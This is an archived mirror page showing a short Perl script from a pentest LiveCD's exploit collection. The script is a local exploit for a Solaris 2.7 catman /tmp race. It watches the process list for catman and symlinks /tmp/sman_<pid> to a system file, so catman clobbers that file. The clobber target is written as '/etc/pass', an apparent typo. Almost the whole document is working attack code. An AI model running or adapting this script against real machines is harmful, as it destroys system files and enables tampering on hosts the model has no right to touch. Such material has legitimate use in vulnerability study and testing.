home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / ctman-race2.pl

< prev

next >

Wrap

Perl Script  |  2005-02-12  |  912b  |  31 lines

---

1. #!/usr/local/bin/perl -w 
2. # The problem is catman creates files in /tmp insecurly. They are based on the PID of the catman
3. # process,  catman will happily clobber any files that are symlinked to that file.
4. # The idea of this script is to watch the process list for the catman process, 
5. # get the pid and Create a symlink in /tmp to our file to be
6. # clobbered.  This exploit depends on system speed and process load.   
7. # This worked on a patched Solaris 2.7 box (August 2000 patch cluster)
8. # SunOS rootabega 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-1
9. # lwc@vapid.betteros.org   11/21/2000   Vapid Labs.
10. # http://vapid.betteros.org
11.  
12.  
13.  
14. $clobber = "/etc/pass";
15. while(1) {
16. open ps,"ps -ef | grep -v grep |grep -v PID |";
17.  
18. while(<ps>) {
19. @args = split " ", $_;
20.  
21. if (/catman/) { 
22.         print "Symlinking sman_$args[1] to  $clobber\n";
23.         symlink($clobber,"/tmp/sman_$args[1]");
24.         exit(1);
25.    }
26.  }
27.  
28. }
29.  
30.  
31.